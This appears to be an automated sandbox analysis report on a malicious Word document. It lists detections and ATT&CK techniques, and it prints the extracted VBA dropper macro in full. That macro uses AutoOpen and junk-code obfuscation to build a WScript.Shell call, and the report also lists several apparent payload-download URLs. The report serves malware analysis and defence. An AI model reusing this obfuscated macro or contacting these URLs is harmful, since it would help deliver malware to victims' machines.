MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros with an AutoOpen function, a common technique for malicious Office documents. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute external commands. The script concatenates strings to form 'WscRipt.sHeLl', which is then likely used to download and execute a payload from one of the embedded URLs.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6817914-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6817914-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End Select Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14 Select Case azure39 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End Select Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84) Select Case Frozen26 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "CheckingAccount84" Sub autoopen() customerloyalty3 = pixel83 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpers In document text (OLE body)
- http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_EIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5850 bytes |
SHA-256: 4062dde47334f0dc16be5d587d8b0d31c51d364fbced89665b61f201709dbf60 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "executive71"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "optical97"
Function quantify62()
On Error Resume Next
Select Case visualize71
Case 980
InvestmentAccount61 = CLng(679)
etailers20 = initiatives48
Persistent12 = CDate(yellow90)
Vista95 = firmware20
Metrics54 = Int(240)
Case 468
deliverables8 = Borders86
yellow13 = Cos(bypassing98)
Bedfordshire22 = Facilitator6
Intelligent97 = ChrB(732)
efficient13 = Technician83
End Select
Select Case Lead93
Case 502
Program35 = CLng(826)
HandmadeWoodenBacon3 = intranet9
model85 = CDate(Dynamic16)
Iowa55 = auxiliary73
recontextualize39 = Int(617)
Case 502
Granite43 = Port66
CheckingAccount45 = Cos(Borders70)
SavingsAccount88 = Plastic81
frontend71 = ChrB(744)
payment54 = HTTP15
End Select
Select Case Brand60
Case 828
LicensedGraniteHat3 = CLng(745)
Groves84 = digital17
grey81 = CDate(Vanuatu23)
program49 = Orchestrator14
models33 = Int(712)
Case 297
transmitting75 = ErgonomicFrozenChips80
firmware86 = Cos(IncredibleWoodenBall36)
plum42 = directional76
Chad15 = ChrB(146)
PracticalMetalPizza64 = index50
End Select
Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
Select Case azure39
Case 489
LibyanDinar82 = CLng(729)
engineer64 = Cambridgeshire19
SmallSteelFish22 = CDate(USB12)
implementation93 = Tunnel24
Generic78 = Int(17)
Case 75
Manager43 = Officer98
deliver76 = Cos(methodology51)
Inverse89 = Forge29
B2B96 = ChrB(466)
GamesComputersSports50 = methodologies36
End Select
Select Case Villages27
Case 245
Representative12 = CLng(839)
BruneiDarussalam86 = connecting15
USB22 = CDate(InvestmentAccount28)
navigating5 = CreditCardAccount16
FrenchSouthernTerritories33 = Int(424)
Case 521
robust65 = Kina97
MoneyMarketAccount17 = Cos(strategic22)
PracticalWoodenPants76 = Buckinghamshire57
Sharable15 = ChrB(718)
FTP18 = BabyMusicIndustrial64
End Select
IUkiv = 0
Select Case pricingstructure62
Case 589
copying15 = CLng(794)
NewZealandDollar2 = compelling79
monetize44 = CDate(Bedfordshire98)
CSS33 = HomeClothing98
payment69 = Int(930)
Case 110
Centralized58 = generate35
TastyWoodenChips2 = Cos(redefine35)
calculate48 = FantasticFrozenCar33
SmallPlasticBike52 = ChrB(129)
capacity4 = HomeLoanAccount9
End Select
Select Case LicensedSoftTable87
Case 796
Bolivia85 = CLng(372)
synthesize72 = Plain57
Grove8 = CDate(Dynamic54)
Utah69 = generate8
SerbianDinar72 = Int(770)
Case 45
supplychains54 = Devolved90
Rubber94 = Cos(withdrawal88)
MoneyMarketAccount18 = USB30
Human14 = ChrB(669)
Upgradable26 = global55
End Select
Select Case needsbased36
Case 247
Berkshire34 = CLng(797)
Key53 = Utah52
turquoise18 = CDate(webenabled7)
Bedfordshire4 = killer42
robust22 = Int(607)
Case 451
Falls88 = USB96
Corners69 = Cos(bypassing45)
bypass36 = Iowa90
orchestration47 = ChrB(276)
Handmade32 = calculate45
End Select
Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
Select Case Frozen26
Case 424
quantifying22 = CLng(765)
scale18 = Identity93
Plastic13 = CDate(Angola17)
SCSI76 = IntelligentSoftSoap70
generate93 = Int(887)
Case 249
SleekMetalCar61 = Userfriendly80
Technician13 = Cos(Motorway61)
Intranet52 = copy36
Lodge32 = ChrB(685)
black63 = Selfenabling13
End Select
Select Case HTTP71
Case 153
salmon60 = CLng(253)
salmon67 = violet33
olive67 = CDate(cyan45)
Product29 = Inlet21
maximize86 = Int(126)
Case 908
pixel47 = International74
zerotolerance95 = Cos(ErgonomicFreshCar41)
SDD92 = ToolsHealthMusic39
Accounts72 = ChrB(831)
SavingsAccount28 = methodical77
End Select
Select Case migration90
Case 157
regional37 = CLng(415)
Landing23 = port22
Customer92 = CDate(productize79)
Organized54 = matrices57
ToolsIndustrial64 = Int(806)
Case 212
Functionality93 = Rapid12
Underpass58 = Cos(Focused18)
Gorgeous79 = grow4
TastyFrozenSausages98 = ChrB(158)
maroon83 = neural52
End Select
End Function
Attribute VB_Name = "CheckingAccount84"
Sub autoopen()
customerloyalty3 = pixel83
quantify37 = Array(GenericRubberPizza21, Borders75, LicensedConcreteHat87, quantify62, Handmade68, Rubber86, Metal48)
supplychains83 = channels32
End Sub
Function payment91()
index64 = Well45
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.